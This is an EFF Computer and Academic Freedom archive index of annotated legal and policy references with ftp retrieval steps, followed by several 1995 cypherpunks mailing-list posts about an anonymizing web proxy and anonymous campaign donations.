* Bill of Rights ... for Electronic ... Learners

This is the "Bill of Rights and Responsibilities for the Electronic
Community of Learners". It could become the first widely endorsed
statement directly related to computers and academic freedom.

=================<a href="ftp://ftp.eff.org/pub/CAF/statements/caf-statement">
statements/caf-statement
=================</a>
* Computer and Academic Freedom Statement -- Draft

This is an attempt to codify the application of academic freedom to
academic computers. It reflects our seven months of on-line discussion
about computers and academic freedom. It covers free expression, due
process, privacy, and user participation.

Comments and suggestions are very welcome (especially when posted to
CAF-talk). All the documents referenced are available on-line.
(Critiqued).

=================<a href="ftp://ftp.eff.org/pub/CAF/statements/caf-statement.critique">
statements/caf-statement.critique
=================</a>
* Computer and Academic Freedom Statement -- Draft -- Critique

This is a critique of an attempt to codify the application of academic
freedom to academic computers. It reflects our seven months of on-line
discussion about computers and academic freedom. It covers free
expression, due process, privacy, and user participation.

Additional comments and suggestions are very welcome (especially when
posted to CAF-talk). All the documents referenced are available
on-line.

=================<a href="ftp://ftp.eff.org/pub/CAF/academic/student.freedoms.aaup">
academic/student.freedoms.aaup
=================</a>
* Student Freedoms (AAUP)

Joint Statement on Rights and Freedoms of Students -- This is the main
U.S. statement on student academic freedom.

=================<a href="ftp://ftp.eff.org/pub/CAF/academic/speech-codes.aaup">
academic/speech-codes.aaup
=================</a>
* Speech Codes (AAUP)

On Freedom of Expression and Campus Speech Codes Expression - An
official statement of the American Association of University
Professors (AAUP)

It says in part: "On a campus that is free and open, no idea can be
banned or forbidden.  No viewpoint or message may be deemed so hateful
or disturbing that it may not be expressed."

=================<a href="ftp://ftp.eff.org/pub/CAF/law/uwm-post-v-u-of-wisconsin">
law/uwm-post-v-u-of-wisconsin
=================</a>
* Expression -- Hate Speech -- UWM Post v. U Of Wisconsin

The full text of UWM POST v. U. of Wisconsin. This recent district
court ruling goes into detail about the difference between protected
offensive expression and illegal harassment. It even mentions email.

It concludes: "The founding fathers of this nation produced a
remarkable document in the Constitution but it was ratified only with
the promise of the Bill of Rights.  The First Amendment is central to
our concept of freedom.  The God-given "unalienable rights" that the
infant nation rallied to in the Declaration of Independence can be
preserved only if their application is rigorously analyzed.

The problems of bigotry and discrimination sought to be addressed here
are real and truly corrosive of the educational environment.  But
freedom of speech is almost absolute in our land and the only
restriction the fighting words doctrine can abide is that based on the
fear of violent reaction.  Content-based prohibitions such as that in
the UW Rule, however well intended, simply cannot survive the
screening which our Constitution demands."

=================<a href="ftp://ftp.eff.org/pub/CAF/law/gillard-v-schmidt">
law/gillard-v-schmidt
=================</a>
* Privacy -- School -- Staff Desk -- Gillard v. Schmidt

Description of an appellate court ruling that the school board could
not search the desk of a school counselor without a warrant.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/email.gov-employee">
law/email.gov-employee
=================</a>
* Privacy -- E-mail -- Government Employees

A U.S. government task force: "[Email] monitoring [of government
employees] of actual communications and communicators may impinge on
the Constitutional rights of freedom of speech (1st Amendment),
against unreasonable search and seizure (4th Amendment), and against
self-incrimination (5th amendment), as well as on the right to
privacy, specifically as set forth in both the Privacy Act and the
ECPA." Enclosed are guidelines for legitimate monitoring of government
employee email.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/mass-student-searches">
law/mass-student-searches
=================</a>
* Privacy -- Mass Students Searches

An excerpt from The ACLU Handbook: _The Rights of Students_, stating that
"there must be a reasonable suspicion directed specifically at each student
before a school official can search students."

=================<a href="ftp://ftp.eff.org/pub/CAF/law/constraints.constitutional">
law/constraints.constitutional
=================</a>
* Constitution -- Public University -- Constraints

Comments from _A Practical Guide to Legal Issues Affecting College
Teachers_ by Patricia A. Hollander, D. Parker Young, and Donald D.
Gehring.  (College Administration Publication, 1985).  Discusses the
constitutional constraints on public universities including the
requirements for freedom of expression, freedom against unreasonable
searches and seizures, due process, specific rules.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/ecpa.umich">
law/ecpa.umich
=================</a>
* Privacy -- E-mail -- ECPA - University Site

A summary of a newspaper report that the U. of Michigan's lawyers
believe(d) that the institution is barred under the federal Electronic
Communications Privacy Act from reading electronic mail.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/privacy.email">
law/privacy.email
=================</a>
* Privacy -- E-mail -- Law -- Hernandez

"Computer Electronic Mail and Privacy", an edited version of a law
school seminar paper by Ruel T. Hernandez.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/privacy.workplace">
law/privacy.workplace
=================</a>
* Privacy -- Workplace

Comments from and about _The new hazards of the high technology
workplace_ see (1991) 104 _Harvard Law Review_ 1898. Talks about email
and other electronic monitoring.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/email.bib">
law/email.bib
=================</a>
* Privacy -- E-mail -- Bibliography

I have been having an e-mail conversation with Stacy Veeder for several 
days on the topic of e-mail privacy. She mailed me this bibliography
which she has compiled for two papers which she is currently writing.

I post it here with permission.

PS - She is interested in talking with anyone who has some views on the 
topic/information to share.

Mark N.

=================
=================

If you have gopher, you can browse the CAF archive with the command
   gopher gopher.eff.org

These document(s) are also available by anonymous ftp (the preferred
method) and by email. To get the file(s) via ftp, do an anonymous ftp
to ftp.eff.org, and then:

  cd  /pub/CAF/law
  get ecpa.1986.godwin
  cd  /pub/CAF/law
  get ferpa.text
  cd  /pub/CAF/faq
  get email.policies
  cd  /pub/CAF/library
  get confidentiality.1.ala
  cd  /pub/CAF/library
  get computer.draft.ala
  cd  /pub/CAF/statements
  get bill-of-rights.aahe
  cd  /pub/CAF/statements
  get caf-statement
  cd  /pub/CAF/statements
  get caf-statement.critique
  cd  /pub/CAF/academic
  get student.freedoms.aaup
  cd  /pub/CAF/academic
  get speech-codes.aaup
  cd  /pub/CAF/law
  get uwm-post-v-u-of-wisconsin
  cd  /pub/CAF/law
  get gillard-v-schmidt
  cd  /pub/CAF/law
  get email.gov-employee
  cd  /pub/CAF/law
  get mass-student-searches
  cd  /pub/CAF/law
  get constraints.constitutional
  cd  /pub/CAF/law
  get ecpa.umich
  cd  /pub/CAF/law
  get privacy.email
  cd  /pub/CAF/law
  get privacy.workplace
  cd  /pub/CAF/law
  get email.bib

To get the file(s) by email, send email to ftpmail@decwrl.dec.com
Include the line(s):

  connect ftp.eff.org
  cd  /pub/CAF/law
  get ecpa.1986.godwin
  cd  /pub/CAF/law
  get ferpa.text
  cd  /pub/CAF/faq
  get email.policies
  cd  /pub/CAF/library
  get confidentiality.1.ala
  cd  /pub/CAF/library
  get computer.draft.ala
  cd  /pub/CAF/statements
  get bill-of-rights.aahe
  cd  /pub/CAF/statements
  get caf-statement
  cd  /pub/CAF/statements
  get caf-statement.critique
  cd  /pub/CAF/academic
  get student.freedoms.aaup
  cd  /pub/CAF/academic
  get speech-codes.aaup
  cd  /pub/CAF/law
  get uwm-post-v-u-of-wisconsin
  cd  /pub/CAF/law
  get gillard-v-schmidt
  cd  /pub/CAF/law
  get email.gov-employee
  cd  /pub/CAF/law
  get mass-student-searches
  cd  /pub/CAF/law
  get constraints.constitutional
  cd  /pub/CAF/law
  get ecpa.umich
  cd  /pub/CAF/law
  get privacy.email
  cd  /pub/CAF/law
  get privacy.workplace
  cd  /pub/CAF/law
  get email.bib



=============== ftp://ftp.eff.org/pub/CAF/faq/netnews.writing ===============
q: Should my university allow students to post to Netnews or have Web pages?

a: Yes. Free inquiry and free expression are an important part of a
university's mission. Most universities encourage and support student
expression and publication. Most universities also seem to give full
network access to all users, even students. (This conclusion is based
on an informal survey posted to comp.admin.policy in October, 1991.
[cafv01n33])

There is probably no need to create special rules for student computer
media; your university likely already has rules for student media.
(Look in your Student Code.) In the U.S., most student publications
are free of university screening, censorship, and most retaliation.
(For state universities, this is a legal requirement.) At the same
time, most universities disclaim responsibility for student
publications, even when the university "owns the presses."

The American Library Association's draft policy recommendation
on electronic services and networks says (in part):

    No user should be restricted or denied access for expressing or
    receiving constitutionally protected speech.  No user's access
    should be changed without due process, including, but not limited
    to, notice and a means of appeal.

- Carl

ANNOTATED REFERENCES

(All these documents are available on-line. Access information follows.)

=================<a href="ftp://ftp.eff.org/pub/CAF/library/computer.draft.ala">
library/computer.draft.ala
=================</a>
* DRAFT: Access to Electronic ... Services and Networks ... (ALA)

A draft interpretation by the American Library Association of the
"Library Bill of Rights"

Says in part: "Libraries and librarians exist to facilitate [freedom
of speech and freedom to read] by providing access to, identifying,
retrieving, organizing, and preserving recorded expression regardless
of the formats or technologies in which that expression is recorded."

=================<a href="ftp://ftp.eff.org/pub/CAF/statements/caf-statement">
statements/caf-statement
=================</a>
* Computer and Academic Freedom Statement -- Draft

This is an attempt to codify the application of academic freedom to
academic computers. It reflects our seven months of on-line discussion
about computers and academic freedom. It covers free expression, due
process, privacy, and user participation.

Comments and suggestions are very welcome (especially when posted to
CAF-talk). All the documents referenced are available on-line.
(Critiqued).

=================<a href="ftp://ftp.eff.org/pub/CAF/statements/caf-statement.critique">
statements/caf-statement.critique
=================</a>
* Computer and Academic Freedom Statement -- Draft -- Critique

This is a critique of an attempt to codify the application of academic
freedom to academic computers. It reflects our seven months of on-line
discussion about computers and academic freedom. It covers free
expression, due process, privacy, and user participation.

Additional comments and suggestions are very welcome (especially when
posted to CAF-talk). All the documents referenced are available
on-line.

=================<a href="ftp://ftp.eff.org/pub/CAF/statements/bill-of-rights.aahe">
statements/bill-of-rights.aahe
=================</a>
* Bill of Rights ... for Electronic ... Learners

This is the "Bill of Rights and Responsibilities for the Electronic
Community of Learners". It could become the first widely endorsed
statement directly related to computers and academic freedom.

=================<a href="ftp://ftp.eff.org/pub/CAF/academic/student.freedoms.aaup">
academic/student.freedoms.aaup
=================</a>
* Student Freedoms (AAUP)

Joint Statement on Rights and Freedoms of Students -- This is the main
U.S. statement on student academic freedom.

=================<a href="ftp://ftp.eff.org/pub/CAF/academic/speech-codes.aaup">
academic/speech-codes.aaup
=================</a>
* Speech Codes (AAUP)

On Freedom of Expression and Campus Speech Codes Expression - An
official statement of the American Association of University
Professors (AAUP)

It says in part: "On a campus that is free and open, no idea can be
banned or forbidden.  No viewpoint or message may be deemed so hateful
or disturbing that it may not be expressed."

=================<a href="ftp://ftp.eff.org/pub/CAF/academic/academic-freedom.wus">
academic/academic-freedom.wus
=================</a>
* Academic Freedom (WUS)

The Lima Declaration on Academic Freedom and Autonomy of Institutions
of Higher Education, an international declaration by the World
University Service.

Source: _World University Service Academic Freedom 1990: A Human
Rights Report_ by Laksiri Fernando, et al.

=================<a href="ftp://ftp.eff.org/pub/CAF/academic/academic-freedom.can">
academic/academic-freedom.can
=================</a>
* CAUT-ACPU Policy on Academic Freedom (Canada)

Policy statement on academic freedom for the Canadian Association
of University Teachers.


=================<a href="ftp://ftp.eff.org/pub/CAF/policies/netnews.uwm.edu">
policies/netnews.uwm.edu
=================</a>
* Edu -- U. of Wisconsin-Milwaukee -- Netnews

These are the network policy resolutions developed by the Computer
Policy Committee at the University of Wisconsin-Milwaukee. The
resolutions were approved by the Committee and forwarded to the
Chancellor. They were given final approval by the Chancellor as campus
administrative policy (memo dated 02/23/93).

They say (to paraphrase) 1) Netnews is important 2) No restrictions
should be imposed without wide consultation 3) The principles of
intellectual freedom developed for university libraries apply to
Netnews material 4) The principles of intellectual freedom developed
for publication in traditional media apply to computer media.

=================<a href="ftp://ftp.eff.org/pub/CAF/policies/netnews.uwo.ca">
policies/netnews.uwo.ca
=================</a>
* U. of Western Ontario -- Netnews policy

It says in part: "In its publications regarding Usenet, CCS should
make it clear that the individual user bears the primary
responsibility for the material that he or she chooses to send or
display on the network or on the University's computer systems."  It
also specifies a procedure for dealing with challenges to material.

=================<a href="ftp://ftp.eff.org/pub/CAF/news/cafv01n33">
news/cafv01n33
=================</a>
[No annotation available.]

=================<a href="http://www.eff.org/CAF/faq/netnews.reading.html">
faq/netnews.reading
=================</a>
* Netnews -- Policies on What Users Read
 
q: Should my university remove (or restrict) Netnews newsgroups
because some people find them offensive? If it doesn't have the
resources to carry all newsgroups, how should newsgroups be selected?
 
a: Material should not be restricted just because it is offensive to
...

=================<a href="http://www.eff.org/CAF/faq/media.control.html">
faq/media.control
=================</a>
* University Control of Media
 
q: Since freedom of the press belongs to those who own presses, a
public university can do anything it wants with the media that it
owns, right?
 
a: No. Like any organization, the U.S. government must work within its
...

=================<a href="ftp://ftp.eff.org/pub/CAF/law/rosenberger_v_u_virginia">
law/rosenberger_v_u_virginia
=================</a>
* Expression -- Public Forum -- Rosenberger v. U. of Virginia

A 1995 U.S. Supreme Court decision that says that it is illegal for a
state university to deny funds to a student newspaper on the grounds
that the newspaper is religious. The decision confirms that the
government cannot discriminate on the basis of viewpoint in
(government-owned) limited public forums.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/san-diego-committee-v-gov-bd">
law/san-diego-committee-v-gov-bd
=================</a>
* Expression -- Public Forum -- Overview -- San Diego Committee v. Gov Bd

Excerpts from San Diego Committee v.  Governing Bd., 790 F.2d 1471.  A
decision by an appellate court that applied the Supreme Court's Public
Forum Doctrine (to a school newspaper).

=================<a href="ftp://ftp.eff.org/pub/CAF/law/stanley-v-magrath">
law/stanley-v-magrath
=================</a>
* Expression -- Public Forum -- Closing -- Stanley v. Magrath

Comments from _Public Schools Law: Teachers' and Students' Rights_ 2nd
Ed. by Martha M. McCarthy and Nelda H. Cambron-McCabe, published in
1987 by Allyn and Bacon, Inc. It says, in part, "[a]lthough school
boards are not obligated to support student papers, if a given
publication was originally created as a free speech forum, removal of
financial or other school board support can be construed as an
unlawful effort to stifle free expression." Also, "school
authorities cannot withdraw support from a student publication simply
because of displeasure with the content" and "the content of a
school-sponsored paper that is established as a medium for student
expression cannot be regulated more closely than a nonsponsored
paper". Also, it tells what to do about libel in student
publications.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/student-publications.misc">
law/student-publications.misc
=================</a>
* Expression -- Offensive -- Student Publications -- Misc

Quotes from the book _Law of the Student Press_ by the Student Press
Law Center (1985,1988). They say that four-letter words are protected
speech, that public universities are not likely to be liable for
publications for which they do not control the contents, and
that the _Hazelwood_ decision does not apply to universities.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/uwm-post-v-u-of-wisconsin">
law/uwm-post-v-u-of-wisconsin
=================</a>
* Expression -- Hate Speech -- UWM Post v. U Of Wisconsin

The full text of UWM POST v. U. of Wisconsin. This recent district
court ruling goes into detail about the difference between protected
offensive expression and illegal harassment. It even mentions email.

It concludes: "The founding fathers of this nation produced a
remarkable document in the Constitution but it was ratified only with
the promise of the Bill of Rights.  The First Amendment is central to
our concept of freedom.  The God-given "unalienable rights" that the
infant nation rallied to in the Declaration of Independence can be
preserved only if their application is rigorously analyzed.

The problems of bigotry and discrimination sought to be addressed here
are real and truly corrosive of the educational environment.  But
freedom of speech is almost absolute in our land and the only
restriction the fighting words doctrine can abide is that based on the
fear of violent reaction.  Content-based prohibitions such as that in
the UW Rule, however well intended, simply cannot survive the
screening which our Constitution demands."

=================<a href="ftp://ftp.eff.org/pub/CAF/law/rust-v-sullivan">
law/rust-v-sullivan
=================</a>
* Expression -- Gag Rule -- Rust v. Sullivan

The decision and dissent for the so-called abortion information gag
rule case. The decision explicitly mentions universities as a place
where free expression is so important that gag rules would not be
allowed.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/rav-v-st-paul.1">
law/rav-v-st-paul.1
=================</a>
* Expression -- Hate Speech -- RAV v. St Paul -- 1

The Supreme Court's _R.A.V. v. City of St. Paul_ decision about hate crimes.

The Court overturned St. Paul's Bias-Motivated Crime Ordinance, which
prohibits the display of a symbol which one knows or has reason to
know "arouses anger, alarm or resentment in others on the basis of
race, color, creed, religion or gender."

By 9-0, the Court said the law was overly broad. By 5-4, the Court said
that the law was also unfairly selective because it only tried to protect
some groups.

Included: summary, majority opinion, 3 concurring opinions.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/perry-v-perry">
law/perry-v-perry
=================</a>
* Expression -- Public Forum -- Campus Mail -- Perry v. Perry

Comments from the ACLU Handbook _The Rights of Teachers_. It says
that campus mail systems (and other school facilities) may or may not
be limited public forums depending on how they are managed. (Perry v.
Perry was about an interschool mail system that was managed as a
nonpublic forum. It was one of the cases that defined the Public Forum
Doctrine.)

Also, a paraphrase from an ACLU handbook _The Rights of Teachers_. It
says that generally, speech, if otherwise shielded from punishment by
the First Amendment, does not lose that protection because its tone is
sharp.

Also, from p. 92, it says that there are legal limits to the oaths a
(public) school can ask its teachers to sign. [Some of these same
limits might apply to what a school can ask a user to sign as a
condition of getting (or keeping) a computer account.]

=================<a href="ftp://ftp.eff.org/pub/CAF/law/broadrick-v-oklahoma">
law/broadrick-v-oklahoma
=================</a>
* Expression -- Vague Regulation -- Broadrick v. Oklahoma, et al.

Summary of case law on overly vague regulation of expression. It says
a statute is unconstitutionally vague when "men of common intelligence
must necessarily guess at its meaning."

=================<a href="ftp://ftp.eff.org/pub/CAF/law/naacp-v-button">
law/naacp-v-button
=================</a>
* Expression -- Overbroad Regulation -- NAACP v. Button, et al.

Summary of case law on overly broad regulation of expression. It says
"[b]ecause First Amendment freedoms need breathing space to survive,
government may regulate in the area only with narrow specificity."

=================<a href="ftp://ftp.eff.org/pub/CAF/law/pd-of-chicago-v-mosley">
law/pd-of-chicago-v-mosley
=================</a>
* Expression -- Content Regulation -- Police Department of Chicago v. Mosley

Summary of case law on content-based regulation of expression. It says
that "above all else, the First Amendment means that government has no
power to restrict expression because of its message, its ideas, its
subject matter, or its content."

=================<a href="ftp://ftp.eff.org/pub/CAF/law/cohen-v-california.4">
law/cohen-v-california.4
=================</a>
* Expression -- Regulation of Tone -- Cohen v. California -- 4

A short quote from _Cohen v. California_: "We cannot sanction the view
that the constitution, while solicitous of the cognitive content of
individual speech, has little or no regard for that emotive function
which, practically speaking, may often be the more important element
of the overall message sought to be communicated."

=================
=================

If you have gopher, you can browse the CAF archive with the command
   gopher gopher.eff.org

These document(s) are also available by anonymous ftp (the preferred
method) and by email. To get the file(s) via ftp, do an anonymous ftp
to ftp.eff.org, and then:

  cd  /pub/CAF/library
  get computer.draft.ala
  cd  /pub/CAF/statements
  get caf-statement
  cd  /pub/CAF/statements
  get caf-statement.critique
  cd  /pub/CAF/statements
  get bill-of-rights.aahe
  cd  /pub/CAF/academic
  get student.freedoms.aaup
  cd  /pub/CAF/academic
  get speech-codes.aaup
  cd  /pub/CAF/academic
  get academic-freedom.wus
  cd  /pub/CAF/academic
  get academic-freedom.can
  cd  /pub/CAF/policies
  get netnews.uwm.edu
  cd  /pub/CAF/policies
  get netnews.uwo.ca
  cd  /pub/CAF/news
  get cafv01n33
  cd  /pub/CAF/faq
  get netnews.reading
  cd  /pub/CAF/faq
  get media.control
  cd  /pub/CAF/law
  get rosenberger_v_u_virginia
  cd  /pub/CAF/law
  get san-diego-committee-v-gov-bd
  cd  /pub/CAF/law
  get stanley-v-magrath
  cd  /pub/CAF/law
  get student-publications.misc
  cd  /pub/CAF/law
  get uwm-post-v-u-of-wisconsin
  cd  /pub/CAF/law
  get rust-v-sullivan
  cd  /pub/CAF/law
  get rav-v-st-paul.1
  cd  /pub/CAF/law
  get perry-v-perry
  cd  /pub/CAF/law
  get broadrick-v-oklahoma
  cd  /pub/CAF/law
  get naacp-v-button
  cd  /pub/CAF/law
  get pd-of-chicago-v-mosley
  cd  /pub/CAF/law
  get cohen-v-california.4

To get the file(s) by email, send email to ftpmail@decwrl.dec.com
Include the line(s):

  connect ftp.eff.org
  cd  /pub/CAF/library
  get computer.draft.ala
  cd  /pub/CAF/statements
  get caf-statement
  cd  /pub/CAF/statements
  get caf-statement.critique
  cd  /pub/CAF/statements
  get bill-of-rights.aahe
  cd  /pub/CAF/academic
  get student.freedoms.aaup
  cd  /pub/CAF/academic
  get speech-codes.aaup
  cd  /pub/CAF/academic
  get academic-freedom.wus
  cd  /pub/CAF/academic
  get academic-freedom.can
  cd  /pub/CAF/policies
  get netnews.uwm.edu
  cd  /pub/CAF/policies
  get netnews.uwo.ca
  cd  /pub/CAF/news
  get cafv01n33
  cd  /pub/CAF/faq
  get netnews.reading
  cd  /pub/CAF/faq
  get media.control
  cd  /pub/CAF/law
  get rosenberger_v_u_virginia
  cd  /pub/CAF/law
  get san-diego-committee-v-gov-bd
  cd  /pub/CAF/law
  get stanley-v-magrath
  cd  /pub/CAF/law
  get student-publications.misc
  cd  /pub/CAF/law
  get uwm-post-v-u-of-wisconsin
  cd  /pub/CAF/law
  get rust-v-sullivan
  cd  /pub/CAF/law
  get rav-v-st-paul.1
  cd  /pub/CAF/law
  get perry-v-perry
  cd  /pub/CAF/law
  get broadrick-v-oklahoma
  cd  /pub/CAF/law
  get naacp-v-button
  cd  /pub/CAF/law
  get pd-of-chicago-v-mosley
  cd  /pub/CAF/law
  get cohen-v-california.4





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 19 Dec 1995 02:43:05 +0800
To: cypherpunks@toad.com
Subject: (fwd) the anonymizer (Mac Anonymous Web Proxy?)
Message-ID: <v02120d05acfb2f88905a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain




>
>Date: Sun, 17 Dec 1995 10:04:16 -0700
>From: webmaster@silkpresence.com (Pete Storm)
>To: apple-internet-providers@solutions.apple.com
>Subject: the anonymizer
>Message-ID: <v02140a03acf9fc782bf3@[204.17.38.3]>
>
>        hi all,
>
>        if everyone could take a look at
><http://anonymizer.cs.cmu.edu:8080/prog/snoop.pl>, i'd appreciate it.  by
>following a link at this site, you begin surfing anonymously.  now, can this
>be programmed and run on a mac(s)?  if so, please contact me personally and
>we'll talk about my clients contracting out for this.
>
>        if you can't get ahold of me (e.g. mail bounces) try
>webmaster@joshua.silkpresence.com or webmaster@aimc.com as well as we're in
>the middle of registering the new network.
>
>thanks,
>phs
>
>
>>>>>>
>
>Pete Storm
>SilkPresence.Com                 Internet/WWW Publishing and Solutions
>webmaster@SilkPresence.Com       http://SilkPresence.Com
>
>Fabio Casartelli (August 1, 1970 - July 18, 1995)  (TdF No. 114)
>
>Fallen in the quest for ultimate glory...
>
>

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 19 Dec 1995 12:58:49 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Political Cleanup program
In-Reply-To: <m0tRWN2-0008yUC@pacifier.com>
Message-ID: <Pine.BSF.3.91.951218102705.4985D-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Dec 1995, jim bell wrote:

> At 02:04 PM 12/17/95 -0800, Detweiler wrote:
...........
> A giver could CLAIM to make any sort of donation at all; but if the system
> were properly designed he could simply be lying to the  officeholder.
> 
> > moreover, other observers
> >would not be aware of the relationship. 
> 
> Not IMMEDIATELY, perhaps, but eventually the books could be opened, perhaps
> as much as years later.  (Let's say, 3 months before the end  of the term of
> the politician.
>  
> And the amounts donated could be withheld, with only the total donated reported
> every 3 months or so.  (And perhaps only to 1 or 2 significant digits of
> accuracy.)  For example, a Senator will be told on January 1, 1996, that up
> until that point he's received "about" $1.4 million dollars of donations.
> He would not be able to link these donations with any particular claim.
> Somebody could claim to have given him "$2000" of donation, which wouldn't
> even show up to the accuracy of the amount told the politician.
> 

I remain unsure of the crypto-relevance, but (just to play Devil's 
Advocate) have you guys heard of canceled checks?  I get mine in my 
statement every month.  Let's see, what could I do with one for $2,000 
payable to Joe Sleazeball Politician, from whom I wanted a favor .....

EBD




> Further techniques could be  used to disguise the rate of giving.
> 
> >why do you think this would be an improvement? 
> 
> Easy.  It would remove much of the reason for a politician to treat one
> citizen differently from another citizen.  
> 
> 
> >to the contrary our current system works hard to require
> >the disclosure of who donated what to a candidate, so the candidate's potential
> >hidden agendas and ulterior motives can be revealed. seems reasonable to 
> >me.
> 
> _EVENTUAL_ public disclosure of such information is not inconsistent with
> my idea.
> 
...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Tue, 19 Dec 1995 03:35:21 +0800
To: Duncan Frissell <bdavis@thepoint.net>
Subject: Re: Political Cleanup program
Message-ID: <199512181833.KAA13146@scruz.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:11 AM 12/18/95 -0500, Duncan Frissell wrote:

>At 10:35 AM 12/18/95 -0500, Brian Davis wrote:
>
>>> A better solution is to move assets and money into forms where
>>> politicians cannot get at them, thus reducing the power of politicians,
>>> and thus the incentive to buy favors from them.
>>
>>I'm not sure what you mean here:  are politicians to be prohibited from 
>>campaigning (which cost money)?  And if politicians, who generally take 
>>the form of human beings, can't get at $$$, how can you or I?
>
>Brian, the above means cut the power and the purse of politicians so they
>have nothing to sell to contributors so no contributors will buy.

Yep.  

If politicians didn't have capricious, arbitrary, and absolute power over 
individuals and businesses, there would be no market for influence peddling.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 19 Dec 1995 03:10:31 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Political Cleanup program
In-Reply-To: <199512180430.UAA02707@blob.best.net>
Message-ID: <Pine.BSF.3.91.951218103237.4985E-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Dec 1995, James A. Donald wrote:

> At 11:04 AM 12/17/95 -0800, jim bell wrote:
> > It occurs to me that it would be a major advance if a system could be set up
> > that would "blind" campaign donations as to their source:  The donor could
> > be satisfied that his donation gets to the candidate or cause, but the
> > candidate couldn't know  who actually paid the money
>
See my earlier post.
 
> To make this work, the government would need to prohibit individuals
> from campaigning for politicians, taking out ads with political 
> consequences, and so on and so forth.   A short step from 
> totalitarianism

Not to mention the death of the First Amendment.  Which, under your 
scenario, would probably mean the death (or curtailment) of Cypherpunks. 

> A better solution is to move assets and money into forms where
> politicians cannot get at them, thus reducing the power of politicians,
> and thus the incentive to buy favors from them.

I'm not sure what you mean here:  are politicians to be prohibited from 
campaigning (which cost money)?  And if politicians, who generally take 
the form of human beings, can't get at $$$, how can you or I?

> of animals that we are. True law	|   James A. Donald
> arbitrary power of the state.		|   jamesd@echeque.com
> 
> 

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 19 Dec 1995 00:19:25 +0800
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Campaign Finance Reform
In-Reply-To: <Pine.SUN.3.91.951218031739.17673A-100000@rwd.goucher.edu>
Message-ID: <Pine.BSF.3.91.951218103957.4985F-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Dec 1995, Jon Lasser wrote:

> On Sun, 17 Dec 1995, jim bell wrote:
...
> > It is absolutely true that you couldn't stop a person from communicating
> > claims of a donation to a politician.   But what you COULD do is to ensure
> > that the donor couldn't PROVE that he made such a donation.  In other words,
> > _I_ could claim that I gave $1K to Senator Sludgepump (a lie) and the good
> > senator would have no idea that I wasn't telling the truth.  The people who
> > REALLY made such donations would be helpless.
> 
> A tricky way around this, if it's done ALMOST properly, is to donate in 
> odd amounts... ie "Senator Sludgepump, I am going to donate $469.23 to 
> your campaign..."
> 
> All this means is that the donations would have to be lumped in some way 
> so that Senator Sludgepump can't find out the exact amounts donated by 
> any individual.

Cancelled checks.

Or, hand check in addressed, stamped envelope to Senator Sludgepump and 
ask him if he would mind sealing it and dropping it in a mailbox.

Etc., etc.

For once, you guys aren't being very creative.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 19 Dec 1995 00:25:48 +0800
To: "David Klur" <dklur@dttus.com>
Subject: Re: redirect of newsgroups
In-Reply-To: <9511188193.AA819305757@cc2.dttus.com>
Message-ID: <199512181543.KAA09973@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"David Klur" writes:
>      For those of us sitting behind a firewall that blocks out all of the 
>      alt, rec, etc.. newsgroups...is there another way to access these 
>      groups?

1) Firewalls don't block newsgroups.
2) This has nothing to do with cryptography. 

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 19 Dec 1995 02:33:52 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Political Cleanup program
Message-ID: <2.2b8.32.19951218161154.0069e694@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:35 AM 12/18/95 -0500, Brian Davis wrote:

>> A better solution is to move assets and money into forms where
>> politicians cannot get at them, thus reducing the power of politicians,
>> and thus the incentive to buy favors from them.
>
>I'm not sure what you mean here:  are politicians to be prohibited from 
>campaigning (which cost money)?  And if politicians, who generally take 
>the form of human beings, can't get at $$$, how can you or I?

Brian, the above means cut the power and the purse of politicians so they
have nothing to sell to contributors so no contributors will buy.

DCF 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 19 Dec 1995 05:03:22 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: Political Cleanup program
In-Reply-To: <m0tRWN2-0008yUC@pacifier.com>
Message-ID: <9512181620.AA10316@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



The main problem with anonymous political donations is that it is easy enough to 
create linkage if the recipient and the donor conspire together. 

There are many other things that campaign laws are intended to achieve beyond 
avoiding bribery. For example foreign nationals cannot make donations to US 
